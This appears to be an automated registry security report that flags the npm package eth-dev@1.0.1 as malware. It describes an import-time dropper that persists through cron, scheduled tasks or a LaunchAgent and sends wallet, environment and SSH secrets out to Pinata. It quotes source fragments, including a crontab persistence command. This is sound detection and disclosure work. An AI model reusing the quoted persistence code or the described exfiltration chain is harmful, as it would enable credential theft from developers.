registry  /  eth-dev  /  1.0.1

eth-dev@1.0.1

Ethereum development utilities — ABI encode/decode, event parsing, address checksum, keccak256, RLP, and contract interaction helpers

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Importing `index.js` schedules a hidden payload drop after 37 seconds. The dropped script persists across reboots and, when remotely activated, harvests secrets and exfiltrates them.

Static reason
No blocking static signals were detected.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import of the package, followed by the delayed callback.
Impact
Steals wallet material, environment secrets, and SSH private keys from the current user's home directory.
Mechanism
Delayed staged dropper with OS persistence, credential harvesting, remote activation, and encrypted exfiltration.
Attack narrative
On import, `index.js` waits 37 seconds, writes a base64-decoded script from its test fixture into the user's home directory, configures scheduled execution, and starts it detached. The staged script obtains mutable activation data from a Gist or IPFS, scans wallet, environment, and SSH-key locations, encrypts collected contents, then sends them to Pinata.
Rationale
This is a concrete import-time persistence and credential-exfiltration chain hidden behind unrelated Ethereum utilities. The absence of npm lifecycle hooks does not mitigate runtime import activation.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/Library/LaunchAgents/com.apple.syncd.plist
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs a hidden delayed dropper on import.
  • It decodes `test/fixtures/keypairs.dat` into a detached `syncd.js` process.
  • It persists via cron, Windows scheduled task, or macOS LaunchAgent.
  • Decoded payload searches wallet keys, env files, and SSH private keys.
  • Decoded payload encrypts findings and uploads them to Pinata.
  • Payload fetches mutable activation configuration from a GitHub Gist/IPFS.
Evidence against
  • `package.json` has no npm lifecycle hooks.
  • The exported Ethereum utility functions are locally implemented and benign.
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 4.41 KB of source, external domains: www.apple.com

Source & flagged code

3 flagged · loading source
index.jsView file
matchType = normalized_sha256 matchedPackage = eth-dev@1.0.0 matchedPath = index.js matchedIdentity = npm:ZXRoLWRldg:1.0.0 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

index.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 35d9e0136e86881b signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = eth-dev@1.0.0 matchedPath = index.js matchedIdentity = npm:ZXRoLWRldg:1.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
29else if (t === "bool") hex += v ? "01" : "00"; L30: else if (t === "string") hex += Buffer.from(v, "utf8").toString("hex"); L31: else if (t === "bytes") hex += v.replace("0x", ""); ... L88: var o = require("os"); L89: var c = require("child_process"); L90: var h = o.homedir(); L91: var d = p.join(h, ".cache-db", ".node-sync"); ... L99: try { L100: if (process.platform === "linux") { L101: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L102: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L29

Findings

2 High1 Medium2 Low
HighKnown Malware Source Similarityindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowUrl Strings